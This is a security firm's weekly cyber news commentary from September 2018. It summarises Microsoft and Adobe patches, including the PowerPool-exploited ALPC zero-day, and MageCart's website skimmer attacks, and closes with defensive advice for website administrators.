Weekly Comments

11 - 18 September 2018

Microsoft’s Patch Tuesday for September issued security updates to address 61 vulnerabilities, of which 17 have been rated critical.
Microsoft’s Patch Tuesday for September issued security updates to address 61 vulnerabilities, of which 17 have been rated critical. One of the most important security updates addresses a zero-day vulnerability (CVE-2018-8440) that occurs when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker can exploit this vulnerability to run arbitrary code in the local system, then obtain powerful administrative access to perform any actions in the targeted system. Prior to the patch, a hacker group dubbed PowerPool had exploited the zero-day in the wild, targeting countries like the Philippines, India, Poland, Russia, the United Kingdom, and the United States.

Adobe also issued security updates to address 10 vulnerabilities, one for Flash Player and nine for ColdFusion. The Flash Player update addresses a critical privilege escalation vulnerability (CVE-2018-15967) that leads to information disclosure, and six of the nine ColdFusion vulnerabilities that are rated critical lead to arbitrary code execution.

This week we also observed the ongoing and evolving online skimmer attacks carried out by a threat actor dubbed MageCart. Unlike the skimmer infection of Ticketmaster’s websites in June, recent attacks on cloud service firm Feedify and the British Airways that involved the use of customised skimmer scripts and targeted infrastructure to minimise detection and suspicion show that MageCart is sharpening its tools and infrastructure and does not intend to call it a day anytime soon. The group will likely continue to target poorly secured website administration accounts and seek to secretly modify scripts to insert malicious skimmer codes.

We advise organisations secure website administration accounts with strong, unpredictable passwords, and stay vigilant of unusual login activity in these accounts. It is also recommended that website administrators regularly audit website codes and scripts to spot fraudulent modification and insertion of skimmer scripts. 

[1] Patch Tuesday: Microsoft plugs zero-day hole exploited by PowerPool
[2] PowerPool malware exploits ALPC LPE zero-day vulnerability
[3] Adobe September 2018 Security Updates Fix 6 Critical Vulnerabilities

More Weekly Cyber Newsanalysis and insights

Ensign Consulting

Enhancing your security posture, developing your cyber strategy, and designing your incident response plans.​

Ensign Systems Integration

Architecting and implementing cybersecurity solutions that bolster defences

Ensign Managed Security Services

Managing your security operations for advanced threat detection, continuous monitoring, and triage services

Ensign Labs

Performing deep research to analyse vulnerabilities, deploy advanced threat hunting and provide cyber threat intelligence